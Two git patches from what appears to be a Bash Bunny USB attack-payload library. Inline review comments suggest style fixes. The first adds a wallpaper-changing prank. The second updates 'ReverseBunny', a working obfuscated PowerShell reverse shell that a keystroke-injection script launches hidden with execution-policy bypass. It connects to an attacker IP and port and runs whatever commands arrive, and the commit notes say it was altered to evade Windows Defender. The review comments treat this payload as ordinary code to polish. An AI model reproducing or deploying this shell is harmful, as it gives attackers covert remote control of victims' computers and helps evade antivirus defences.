From 78eb6e38282e537ddea4cfeee77f7a907c91edea Mon Sep 17 00:00:00 2001
From: xhico <31449326+xhico@users.noreply.github.com>
Date: Sat, 2 Oct 2021 19:25:34 +0100
Subject: [PATCH 1/2] Wallpaper Changer (#245)

---
 .../prank/WallpaperChanger/payload.txt | 43 ++++++++++++++++++
 payloads/library/prank/WallpaperChanger/s.ps1 | 10 ++++
 payloads/library/prank/WallpaperChanger/w.png | Bin 0 -> 3211 bytes
 3 files changed, 53 insertions(+)
 create mode 100644 payloads/library/prank/WallpaperChanger/payload.txt
 create mode 100644 payloads/library/prank/WallpaperChanger/s.ps1
 create mode 100644 payloads/library/prank/WallpaperChanger/w.png

diff --git a/payloads/library/prank/WallpaperChanger/payload.txt b/payloads/library/prank/WallpaperChanger/payload.txt
new file mode 100644
index 00000000..daf073d0
--- /dev/null
+++ b/payloads/library/prank/WallpaperChanger/payload.txt
@@ -0,0 +1,43 @@
+#!/bin/bash
+#
+# Title: Change windows wallpaper
+# Author: xhico
+# Version: 1.0
+# Target: Windows
+#
+# Changes the users wallpaper from the ${SWITCH_POSITION} folder
+# in the payloads library of the Bash Bunny USB Disk partition.
+#
+# Colors:
+# | Status | Color | Description |
+# | ---------- | ------------------------------| ------------------------------------------------ |
+# | SETUP | Magenta solid | Setting attack mode, getting the switch position |
+# | FAIL | Red slow blink | Could not find the wallpaper file |
+# | ATTACK | Yellow single blink | Running the Powershell Script |
+# | FINISH | Green blink followed by SOLID | Script is finished |
+
+# Magenta solid
+LED SETUP
+
+# Get the switch position
+GET SWITCH_POSITION
+PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION
+
+# Check for w.png s.ps1 files
+if [[ ! -f ${PAYLOAD_DIR}/w.png || ! -f ${PAYLOAD_DIR}/s.ps1 ]]; then
+ LED FAIL
+ exit 1
+fi
+
+# Set the attack mode to HID and STORAGE
+ATTACKMODE HID STORAGE
+
+# Yellow single blink
+LED ATTACK
+
+# Run the command to change the wallpaper
+RUN WIN powershell ".((gwmi win32_volume -f 'label=''BASHBUNNY''').Name+'payloads\\$SWITCH_POSITION\s.ps1') \"((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\w.png')\""
+
+
+# Green LED for finished
+LED FINISH
\ No newline at end of file
diff --git a/payloads/library/prank/WallpaperChanger/s.ps1 b/payloads/library/prank/WallpaperChanger/s.ps1
new file mode 100644
index 00000000..fdc80206
--- /dev/null
+++ b/payloads/library/prank/WallpaperChanger/s.ps1
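Review bot: The two WMI filters on the `RUN WIN powershell` line spell the volume label differently (`'label=''BASHBUNNY'''` for the script path, `'label=''BashBunny'''` for the image path); WQL string comparison is case-insensitive in practice so both probably resolve, but a reader takes the difference as intentional, and one spelling should be used for both. The header table says FAIL means `Could not find the wallpaper file`, while the guard on the `if [[ ! -f ... ]]` line also fires when `s.ps1` is missing, so the row should read `Could not find w.png or s.ps1 in the payload folder`. Quoting the expansions in that test keeps it safe should the path ever contain spaces: `if [[ ! -f "${PAYLOAD_DIR}/w.png" || ! -f "${PAYLOAD_DIR}/s.ps1" ]]; then`.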
@@ -0,0 +1,10 @@
+# Receives the path for the wallpaper file from the Bunnys Playload Dir
+Param([string]$Path)
+
+# Sets the new wallpaper path to the desktop
+# Copies the file from the Playload Dir to the Users Desktop
+$new_path = "$env:USERPROFILE\Desktop\w.png"
+cp $Path $new_path
+
+#Sets the wallpaper
+Set-ItemProperty -path 'HKCU:\Control Panel\Desktop\' -name wallpaper -value $new_path
\ No newline at end of file
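Review bot: `Param([string]$Path)` on the second line accepts any string, and `cp $Path $new_path` passes it to Copy-Item unquoted, so an empty or misspelled path only surfaces as a Copy-Item error after the script has started; marking the parameter `[Parameter(Mandatory)]` and guarding with `if (-not (Test-Path -LiteralPath $Path)) { throw "wallpaper file not found: $Path" }` before the copy would fail early with a clear message. The comment `# Sets the new wallpaper path to the desktop` above the `$new_path` assignment describes the registry write that happens later, not that line; `# Destination on the user's Desktop where the image is copied` is what the line does.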
diff --git a/payloads/library/prank/WallpaperChanger/w.png b/payloads/library/prank/WallpaperChanger/w.png new file mode 100644 index 0000000000000000000000000000000000000000..6cc3b27881594206cd7442e0aeab419600616af5 GIT binary patch literal 3211 zcmV;640Q8}P)T z8yg#|iYjIR01MYiL_t(&fu&mKg0w0OwRaH_dl_|n|7W}jSg_3O?sxNR#zG(@CnrHo z`;8cWNS!8&BQn&ytg50Nr}ulAL3AmzkmWs%Ma4-L{%Y6=-s*oA?*3VqOJiQV zl`-b2FUpSB1Bv3SNgc)*MPa)*PTIurI>Gc$+GyS`o1zzqQtAc1xviQySzhzH9)_W= zEp?j4i%9tG(>$67aL{$|B*D)BH^>^w#oSnWD zq;bGx%xRhorAZm}{O4B;=T&9a`C2gQdie`=ZjI_H=flve_+es$cmt zudWFOEWW(tpeq|+9#AAe&;i4u#7=^`SXm>!G^H}x{F_lJ#(;Xka-uwH9GbZISr~pC zqGe4C8J6=h0^8Z;09)>p=y-0?=Uc>V0{T=p3x={uLJxzS)CF%Y-V+a}zZT;K%$Bt{ zWm@h#$3Dk@dl=kuVD73U=XCeNGIJ%vVkcP1ASLgKBav~S^SSE!^QC#~`IDKU_K z#~VzS=OMFR(xYV*+10ul8FTa;!Md~4Djzdob0Zv)uI?a8bsFa8lYYN1C)uBBv*H6- zlgk>x$ojF>W?+gddPR17z0ZCYK;G%ahM9JAkgUvrnMYa}M^3m}#Gq-!B|SQ#4s!eg z>$4I0$-t{6(@Om+k?Ig&&jLqG>dR9=*Je%ZkeFe>AW28S@v>+>G=jg(;L?9$npt+LR zPLm|lA^_qj)CGj_HRyFaCbIwh_l%`n=iHtSAlYW^TN+ZIt` zOOhk_+#eZcq&jpbN#mLbAyUzeyc|;!0V+cQMUxzZD@QX0XpuTeM+MI5>S15R&#E^{ z5p53CZJ6DOIPh}}-~tsAB-)ylZkso*6Rozv%=QOH`(e#%S_1n3=ZZ3%&2a~cJg@2}OY4E&doJ(jt)P}jzY7dh^ehXH7z z!chm}SUTW=>zL+SKQr7I{rx^>^umoEf;P__N^Ng1P&I>z)P@z9gmxgv;B!8pfk-px zoHisee-s*r3jrY_gdfcoR`_TlsCiedwsm9SaT0`97;aGqtUE$}Go$wSg^#1(BP#34 zpmL69Tu%^_allj`FFVUR6=DI(CK`rd(;g9qrRcd6{?q+FQWms1g4>LP%=}9FZPs1` z#fMJ{Z6a@t+tb7LqAeIkY-7NcA_#IVTOxc}q=iwcdyPo9I|tr7Dj?%E&&x7noy8PB zVNkN6OuH`^08akO^%=IfwD3|SO%0IJykZlAa%rUr-PcZXz;8wc&|zX$+6P!|N%RR= zy{@f}j*3rE4`~683uJ>>4-Vw4ywNkkePcxTmwPH-GAxV@uRJ?XJLA}1Q%Y*k<~Bg` zyjqb;5-FcdKp!0~#2y)a{bn;*^2$=q!H86Fngv}s1gu1(eg(l;W=kqrf#j_Ebo4kl zWIx!-wLo(=&zG2%3Si6BHHu5;v>rAqn&{lwAMMd*dz#z4$0sclPP;)Jz+1Ji1b(j1 z*9sMK({xv7Sa!@eADPry3o7oRE-1;|Mbr!S9vhbP z@y5<@iwgZj1ooU*QhJ7a!$Bh-6^64Gje?38CK}I*x3`zEZHuC9$G1Wp+d8vdbi1Q) z^fr=;asNJ*p?;p9@grH&9h!uru|4ftG$=AfyRGXj)EM7qgFDBs3A>Y7f0JO{PE?qq zwG+8qu(`)Fu`5f7Fdb&+dL*XV7JEHUf}-#t$qj6s~& zt_=IRn#e})6Ax={HR5*CJA^SAe-4=YB4MjFZJcB 
z@Mz3tp*tTQNOps`$5=kg`$O9-cp>1qD5lSt#P9v+Rbi~3W#LhlGUm+sl*;xt$MB>y zjk($lUwNUd8~C-DwjUVLs_>&@ew7#7k;WI(xD5Z)##k?V<>)uitlBM%v?61*uX!lD=IbxG94rhTz)o zOP^^e`4BsR*cTS}T5BFm745BGH9WU&%q=zgaNj}nf<5vB@{!8*oUhxVYQ};4R|eS3QLm>pyw8Qc$9w_iU`k*z`tfq4r&EVPP^hoA`!mU z35QXJCZvP{g;iSdw{l;+QCUJ z4uZs_zO_A^CvP%B+W}J8RYfn3w3qiZjeSvd-GE25%JzhL72{vK6NMT=hhBbdLZmA% zmCL=|Hcj6`@qP2*ER2>N!^^A^TPO}#=j%DgMKW3G$>HLkk2RIK#FKDLt(hWRWKgRy z`B7q7=d7Ldyf}MvNb$fN%3em#b}|_khg(`gS{bf_h5h0PKbHiWu1=7Szc_=p=unE9 z$<1n+8f~GjdO8)k${@qq+jzT0iuCiTv*ALC!E4lJ(0Irx?u3zwSgJlA*_@H?baPC zuCa>e7l13KX?#0omrcCCtJ6fQ<~QMU5&@a|>(B2A0kSuLJ3hRLCz}BL-_&V> z2N7Qq$vF6PTUrs=j`8RBU5AWoG5?PLWRkm-kHk_D-yug$$p6JtE+Wd`=n?6SfUR^1 zsQ%E{e~IxgVvFuT*Cej^V8(#7>xKzUbH0|=OBFqx6a5d7?P`4nDgiQ%)BfcbaE6Hf x&rN%ju*tike=mERXPMd;6fxm1zq9#S{sWVJu0flIx{m+=002ovPDHLkV1hj`B Date: Sat, 2 Oct 2021 21:58:58 +0200 Subject: [PATCH 2/2] Updated ReverseBunny (#469) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * Uploaded ReverseBunny Obfuscated reverse shell via powershell * Uploaded WifiSnatch Get your targets stored wifi information and credentials, store them on your Bashbunny and hop away 🐇 * Update ReverseBunny.txt Changed payload to evade Windows Defender * Update payload.txt Added new "Eject Method" - props to Night(9o3) * Update README.md --- .../remote_access/ReverseBunny/README.md | 5 +- .../ReverseBunny/ReverseBunny.txt | 2 +- .../remote_access/ReverseBunny/payload.txt | 51 ++++++++++++++----- 3 files changed, 40 insertions(+), 18 deletions(-) diff --git a/payloads/library/remote_access/ReverseBunny/README.md b/payloads/library/remote_access/ReverseBunny/README.md index 7f478362..ba8e344e 100644 --- a/payloads/library/remote_access/ReverseBunny/README.md +++ b/payloads/library/remote_access/ReverseBunny/README.md 
@@ -6,7 +6,4 @@ Version: 1.0 Getting remote access via obfuscated reverse shell. -ReverseBunny.txt needs to be configured $IP=Attacker IP, $PORT=Attacker Port & present on the BB. - -# Red.............Payload running -# Green .............Finished +RevBunny.txt needs to be configured $IP=Attacker IP, $PORT=Attacker Port & present on the BB. diff --git a/payloads/library/remote_access/ReverseBunny/ReverseBunny.txt b/payloads/library/remote_access/ReverseBunny/ReverseBunny.txt index 1aa4f158..65d50681 100644 --- a/payloads/library/remote_access/ReverseBunny/ReverseBunny.txt +++ b/payloads/library/remote_access/ReverseBunny/ReverseBunny.txt 
@@ -1 +1 @@ -$IP='0.0.0.0';$PORT=4444; ( nEW-ObjeCt sysTEm.io.CoMPRessIOn.deFLatEStReaM([sYstem.iO.MemorySTREam][COnVERT]::frOMBASE64STring( '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' ) , [iO.CompRESsiON.CoMprEssionmodE]::deComprEsS )|%{nEW-ObjeCt io.STrEaMrEadEr( $_ , [sYSTEm.text.EncoDING]::asCii)} |% { $_.rEaDTOEND( ) } ) | . ( ([StrIng]$VeRboSepReFeReNCE)[1,3]+'x'-JoIN'') \ No newline at end of file +$bb =(gwmi win32_volume -f 'label=''BashBunny''').Name;$IP='0.0.0.0';$PORT=4444;Start-Sleep 5;New-Item -ItemType file $bb"DONE";;(New-Object -comObject Shell.Application).Namespace(17).ParseName($bb).InvokeVerb("Eject");${J`F5Z6}= [typE]("{3}{4}{1}{2}{0}"-f'INg',("{0}{1}" -f'XT.','eN'),'cOD','T','e'); ${clI`e`Nt} = &("{1}{0}{3}{2}" -f 'ew','N','t',("{0}{1}"-f ("{0}{1}"-f'-O','bj'),'ec')) ("{2}{7}{1}{3}{0}{6}{5}{8}{4}" -f("{1}{0}"-f '.T',("{0}{1}"-f 'ke','ts')),'.','Sys',("{0}{1}"-f 'Net',("{1}{0}" -f'Soc','.')),'nt','PCl','C','tem','ie')(${IP},${pO`RT});${st`ReAm} = ${c`l`iENT}.("{2}{0}{1}{3}"-f'e',("{0}{1}" -f 'tSt','r'),'G','eam')."I`N`Voke"();[byte[]]${by`T`es} = 0..65535|.('%'){0};while((${i} = ${stRe`AM}.("{1}{0}" -f 'ad','Re')."InVO`KE"(${B`y`TES}, 0, ${BYt`eS}."LEn`GTh")) -ne 0){;${D`ATA} = (.("{3}{1}{2}{0}" -f ("{0}{1}"-f 'je','ct'),'w-','Ob','Ne') -TypeName ("{6}{5}{0}{4}{2}{3}{7}{1}"-f 'st',("{0}{1}" -f 'di','ng'),("{1}{0}"-f ("{1}{0}" -f't.A','Tex'),'.'),("{1}{0}" -f'E',("{1}{0}" -f'II','SC')),'em','y','S','nco'))."Ge`Ts`Tr`inG"(${BYt`ES},0, ${I});${Se`N`DbAck} = (.("{1}{0}" -f'ex','i') ${d`AtA} 2>&1 | &("{1}{0}{2}" -f'ut','O',("{0}{1}" -f '-',("{2}{0}{1}" -f 't',("{1}{0}" -f'g','rin'),'S'))) );${Send`B`Ac`K2} = ${sEn`DBack} + 'PS ' + (.("{1}{0}"-f 'wd','p'))."P`ATh" + '> ';${sEN`dB`yTE} = ( ${j`F`5Z6}::"AS`CIi").("{1}{0}{2}"-f 't','Ge',("{0}{1}" -f 'By','tes'))."I`NvoKE"(${s`e`NdBA`Ck2});${str`e`AM}.("{0}{1}"-f 'W',("{0}{1}" -f'r','ite'))."In`VOke"(${Send`BYtE},0,${Send`BYtE}."lE`N`gTh");${s`Tr`eaM}.("{1}{0}" -f 
'ush','Fl')."inV`oKe"()};${ClI`E`Nt}.("{1}{0}" -f 'se','Clo')."iNV`O`KE"(); diff --git a/payloads/library/remote_access/ReverseBunny/payload.txt b/payloads/library/remote_access/ReverseBunny/payload.txt index 7f45b871..945fac51 100644 --- a/payloads/library/remote_access/ReverseBunny/payload.txt +++ b/payloads/library/remote_access/ReverseBunny/payload.txt @@ -1,30 +1,55 @@ +#!/bin/bash +# # Title: ReverseBunny -# Description: Obfuscated reverse shell, executed via powershell +# Description: Get remote access using obfuscated powershell code - If caught by AV, feel free to contact me. # Author: 0iphor13 -# Version: 1.0 -# Category: Execution +# Version: 1.1 +# Category: Remote_Access # Attackmodes: HID, Storage +LED SETUP + GET SWITCH_POSITION -ATTACKMODE HID STORAGE DUCKY_LANG de -#LED RED - DON'T EJECT - PAYLOAD RUNNING +rm /root/udisk/DONE -LED R FAST +ATTACKMODE HID STORAGE + +#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING + +LED STAGE1 DELAY 5000 -RUN WIN "powershell -NoP -W hidden -NonI -Exec Bypass" -DELAY 2000 +RUN WIN "powershell -NoP -NonI -W hidden -Exec Bypass" +DELAY 6000 -Q STRING "Set-Clipboard -Value (gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\ReverseBunny.txt'))" -DELAY 5000 +Q STRING "Set-Clipboard -Value (gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\RevBunny.txt'))" +DELAY 10000 Q ENTER -DELAY 5000 +DELAY 10000 Q CONTROL v -DELAY 5000 +DELAY 10000 Q ENTER +DELAY 1000 + +LED STAGE2 + +until [ -f /root/udisk/DONE ] + do + sleep 0.2 +done + +LED CLEANUP + +rm /root/udisk/DONE + +DELAY 100 + +sync + +DELAY 100 LED FINISH -#SAVE TO EJECT \ No newline at end of file +#SAVE TO EJECT
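Review bot: The `until [ -f /root/udisk/DONE ]` loop in the payload.txt hunk has no upper bound, so if the marker file never appears the payload stays in `LED STAGE2` indefinitely and never reaches `LED CLEANUP` or `LED FINISH`; a bounded wait that falls through to `LED FAIL` after a fixed number of iterations would make the stuck state visible on the device. The first `rm /root/udisk/DONE` runs before the marker can exist, so on a fresh run it reports a missing-file error; `rm -f /root/udisk/DONE` is the intended form for both removals. The loop's `do` is on its own line with the body indented under it, which differs from the rest of the file; `until [ -f /root/udisk/DONE ]; do` keeps the usual layout.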